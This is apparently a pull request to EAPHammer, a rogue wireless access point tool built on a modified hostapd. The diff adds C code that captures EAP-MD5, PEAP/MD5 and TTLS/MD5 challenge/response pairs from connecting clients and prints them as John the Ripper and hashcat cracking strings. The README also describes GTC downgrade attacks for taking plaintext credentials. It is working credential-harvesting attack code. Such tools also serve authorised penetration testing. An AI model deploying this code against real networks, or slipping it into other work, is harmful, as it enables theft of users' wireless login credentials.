### PR TITLE
Eap md5 logging

### DIFF
--- a/README.md
+++ b/README.md
@@ -38,7 +38,10 @@ Features
 - Fast and automated PMKID attacks against PSK networks using hcxtools
 - Password spraying across multiple usernames against a single ESSID
 
-### New (as of Version 0.9.1)(latest): GTC Downgrade Attacks
+### New (as of Version 1.0.0)(latest): 
+EAPHammer now supports logging for EAP-MD5,EAP-PEAP/MD5, and EAP-TTLS/MD5.
+
+### GTC Downgrade Attacks
 EAPHammer will now automatically attempt a GTC Downgrade attack against connected clients in an attempt to capture plaintext credentials (see: https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s). 
 
 ### Improved Certificate Handling

--- a/local/hostapd-eaphammer/src/eap_server/eap_server_md5.c
+++ b/local/hostapd-eaphammer/src/eap_server/eap_server_md5.c
@@ -119,6 +119,11 @@ static void eap_md5_process(struct eap_sm *sm, void *priv,
 	wpa_hexdump(MSG_MSGDUMP, "EAP-MD5: Response", pos, CHAP_MD5_LEN);
 
 	id = eap_get_id(respData);
+#ifdef EAPHAMMER
+
+	wpe_log_chalresp("eap-md5", sm->identity, sm->identity_len, sm->identity, sm->identity_len, data->challenge, CHALLENGE_LEN, pos, CHAP_MD5_LEN, id);
+
+#endif
 	if (chap_md5(id, sm->user->password, sm->user->password_len,
 		     data->challenge, CHALLENGE_LEN, hash)) {
 		wpa_printf(MSG_INFO, "EAP-MD5: CHAP MD5 operation failed");

--- a/local/hostapd-eaphammer/src/eap_server/eap_server_mschapv2.c
+++ b/local/hostapd-eaphammer/src/eap_server/eap_server_mschapv2.c
@@ -368,7 +368,7 @@ static void eap_mschapv2_process_response(struct eap_sm *sm,
 #ifdef EAPHAMMER
 
 	challenge_hash(peer_challenge, data->auth_challenge, user, user_len, wpe_challenge_hash);
-	wpe_log_chalresp("mschapv2", name, name_len, user, user_len, wpe_challenge_hash, 8, nt_response, 24);
+	wpe_log_chalresp("mschapv2", name, name_len, user, user_len, wpe_challenge_hash, 8, nt_response, 24, 0);
 #endif
 
 #ifdef CONFIG_TESTING_OPTIONS

--- a/local/hostapd-eaphammer/src/eap_server/eap_server_ttls.c
+++ b/local/hostapd-eaphammer/src/eap_server/eap_server_ttls.c
@@ -618,7 +618,7 @@ static void eap_ttls_process_phase2_chap(struct eap_sm *sm,
 		 challenge, challenge_len, hash);
 
 #ifdef EAPHAMMER
-	wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
+	wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, sm->identity, sm->identity_len, challenge, challenge_len, password, password_len, 0);
 
 	if ((eaphammer_global_conf.always_return_success) || os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) ==
 	    0) {
@@ -704,7 +704,7 @@ static void eap_ttls_process_phase2_mschap(struct eap_sm *sm,
 	}
 
 #ifdef EAPHAMMER
-	wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
+	wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24, 0);
 
 	if ((eaphammer_global_conf.always_return_success) || os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) {
 		wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
@@ -834,7 +834,7 @@ static void eap_ttls_process_phase2_mschapv2(struct eap_sm *sm,
 #ifdef EAPHAMMER
 
 	challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
-	wpe_log_chalresp("eap-ttls/mschapv2", sm->identity, sm->identity_len, username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
+	wpe_log_chalresp("eap-ttls/mschapv2", sm->identity, sm->identity_len, username, username_len, wpe_challenge_hash, 8, rx_resp, 24, 0);
 #endif
 #ifdef CONFIG_TESTING_OPTIONS
 	{

--- a/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.c
+++ b/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.c
@@ -145,6 +145,27 @@ void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_
     	wpe_log_file_and_stdout("\t eap_id:\t\t\t");
 		wpe_log_file_and_stdout("%d\n\n", eap_id);	
 	}
+
+    if (strncmp(type, "eap-md5", 7) == 0) {
+
+        wpe_log_file_and_stdout("\t hashcat NETNTLM:\t\t");
+
+		// print response
+		for(x = 0; x < response_len; x++) {
+
+			wpe_log_file_and_stdout("%02x", response[x]);
+		}
+        wpe_log_file_and_stdout(":");
+
+		// print response
+        for (x = 0; x < challenge_len; x++)
+            wpe_log_file_and_stdout("%02x", challenge[x]);
+        wpe_log_file_and_stdout(":");
+
+		// print eap_id
+        wpe_log_file_and_stdout("%02x", eap_id);
+        wpe_log_file_and_stdout("\n\n\n");
+	}
 	// end eaphammer eap-md5 logging
 
     if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {

--- a/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.c
+++ b/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.c
@@ -148,6 +148,29 @@ void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_
 
     if (strncmp(type, "eap-md5", 7) == 0) {
 
+        wpe_log_file_and_stdout("\t jtr NETNTLM:\t\t\t");
+        for (x = 0; x < username_len; x++) {
+
+            wpe_log_file_and_stdout("%c",username[x]);
+		}
+        wpe_log_file_and_stdout(":$chap$");
+
+        wpe_log_file_and_stdout("%d*", eap_id);
+
+		// print response
+		for(x = 0; x < response_len; x++) {
+
+			wpe_log_file_and_stdout("%02x", response[x]);
+		}
+        wpe_log_file_and_stdout("*");
+
+		// print challenge
+        for (x = 0; x < challenge_len; x++) {
+
+            wpe_log_file_and_stdout("%02x", challenge[x]);
+		}
+        wpe_log_file_and_stdout("\n\n\n");
+
         wpe_log_file_and_stdout("\t hashcat NETNTLM:\t\t");
 
 		// print response
@@ -157,7 +180,7 @@ void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_
 		}
         wpe_log_file_and_stdout(":");
 
-		// print response
+		// print challenge
         for (x = 0; x < challenge_len; x++)
             wpe_log_file_and_stdout("%02x", challenge[x]);
         wpe_log_file_and_stdout(":");

--- a/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.c
+++ b/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.c
@@ -98,7 +98,7 @@ void eaphammer_write_fifo(const u8 *username,
 }
 // end eaphammer fifo
 
-void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_len, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_len, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len, const u8 eap_id) {
     time_t nowtime;
     int x; 
 
@@ -139,6 +139,13 @@ void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_
 							response_len); 
 	}
 	// end eaphammer
+
+	// start eaphammer eap-md5 logging 
+    if (strncmp(type, "eap-md5", 7) == 0) {
+    	wpe_log_file_and_stdout("\t eap_id:\t\t\t");
+		wpe_log_file_and_stdout("%d\n\n", eap_id);	
+	}
+	// end eaphammer eap-md5 logging
 
     if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
         wpe_log_file_and_stdout("\t jtr NETNTLM:\t\t\t");

--- a/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.h
+++ b/local/hostapd-eaphammer/src/eaphammer_wpe/eaphammer_wpe.h
@@ -40,5 +40,5 @@ extern struct eaphammer_global_config eaphammer_global_conf;
 void wpe_log_file_and_stdout(char const *fmt, ...);
 void eaphammer_write_fifo(const u8 *username, size_t username_len, // eaphammer 
 			const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len); // eaphammer
-void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_len, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_chalresp(char *type, const u8 *full_username, size_t full_username_len, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len, const u8 eap_id);
 void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);


### PR DESCRIPTION
Support for the following EAP types has been added:

- EAP-MD5
- EAP-PEAP/MD5
- EAP-TTLS/MD5



